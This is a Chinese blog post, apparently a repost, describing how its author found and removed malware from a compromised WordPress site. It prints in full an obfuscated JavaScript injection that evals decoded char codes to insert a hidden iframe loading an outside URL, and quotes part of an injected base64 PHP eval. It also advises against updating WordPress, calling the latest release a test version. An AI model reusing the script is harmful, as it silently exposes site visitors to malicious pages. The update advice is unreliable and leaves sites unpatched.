今早正常打開網站後發現首頁偏左後,第一反應該檢視源碼後發現,頁面被挂上了JS馬:<script>if(window.document)a=("v532b5".indexOf+Date).substr(0,6);aa=([1,2,3]['reverse']+[].reverse).substr(0,6);if(aa===a)f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,67,83,83,69,61,58,76,82,82,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,67,83,83,69,61,58,76,82,82,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,-30,-30,86];md='a';e=window['eval'];w=f;s='';g='f'+'ro'+'mCh'+'ar'+'Cod'+'e';for(i=0;i-w.length<0;i++){j=i;s=s+String[g](39+w[j]);}
if(a===aa)e(s);</script>
于是第一時間關閉了網站,暫停其運作先!進入伺服器将程式檔案夾打包,下載下傳後發現首頁被注入了:eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20n。。。。。。省略!
直接下載下傳資料庫檢查資料是否被注入,然而慶幸的資料很安全,接着,我需要做的是檔案比工作!
郁悶的是别的和主程式完成相同,而不一樣的是wp-config 以及index别的全部一模一樣,顯然這位馬夫隻是對index進行了寫入操作,然而注意到沒有就是源碼是增加了一個.htaccess,這個檔案也許沒太大的在意,但是我曾經很久時間都是在搞linux,而這個正是linux下用的僞靜态,Apache下才會用這種Rewrite技術(位址映射技術專業術語叫脈沖技術)。對于這種玩意又這麼大顯然不是個好東西,下載下傳下來 再删除掉将index.php修改後,等待,是否會再被寫入?
一分鐘後,兩分鐘後,……六分鐘後,果然index.php又被寫入了,TMD ,怒了,不過不急,再看看搜尋伺服器是否還存在.htaccess,果然,又隐藏到其它的站點中去了。
這時候需要分析一下,.htaccess是如何生成的,在本機上我們用的方法是CMD COPY 等指令,而在伺服器上 PHP程式一定是通過fopen,file_put_contents檔案名直接取.htaccess就行了,那麼我們現在就是去找那些正在運作中的站點是否存在這些含數,經過WEBlog以及windows自帶的搜尋終于被我把木馬一網打盡!
下面對于程式我們還需要做的是安全,讀寫,以及base64_decode,我個人建議是要關閉這個函數,而對于安全來說 wp的最新版未必是最安全的,最新版隻是測試版本,老版本如果你對于函數,類都很熟悉大可不必一有更新就去更新最先版,我有個站還用的2.8版,一樣很安全,安全不安全關緊在于人,再高的強也有人翻得過 哈哈 一個上午就這麼過去了!
轉載于:https://www.cnblogs.com/sheevy/archive/2012/02/07/2341295.html